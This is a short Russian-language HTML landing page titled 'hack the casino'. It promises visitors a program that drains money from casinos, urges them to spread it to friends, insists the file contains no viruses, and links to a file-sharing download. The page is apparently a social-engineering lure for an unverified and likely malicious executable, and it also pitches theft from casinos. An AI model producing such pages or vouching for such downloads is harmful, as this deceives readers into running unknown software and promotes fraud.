<!DOCTYPE html>
<html lang="ru">
  <head>
    <link href="https://fonts.googleapis.com/css?family=Montserrat:400,500,700|Old+Standard+TT&display=swap&subset=cyrillic" rel="stylesheet">
    <meta charset="UTF-8">
    <link rel="stylesheet" href="style.css">
    <title>ВЗЛОМАТЬ КАЗИНО</title>
  </head>
<body>
<div class='container'>
  <h1 class='text'>ВЫ СЧАСТЛИВЧИК!</h1>
  <h3 class='text'>Вам выпала уникальная возможность наказать лживых капиталовладельцев и выкачать деньги из их казино!</h3>
  <p>Вы сможете сделать это с помощью нашей программы(вы можете распространять ее как угодно, делая и ваших друзей богаче!)</p>
  <p>Никаких смс, регистраций, ввода телефона. Мы оставим лишь прямую ссылку на файлообменник. Можете сами проверить файл на вирусы(их там все равно нет!)</p>
  <a href='https://drive.google.com/file/d/1-1874F8xLVxQYVTo-k0J22p07WdYjvFe/view?usp=sharing' class='ssylka' target="_blank">КЛИК</a>
</div>
</body>
</html>
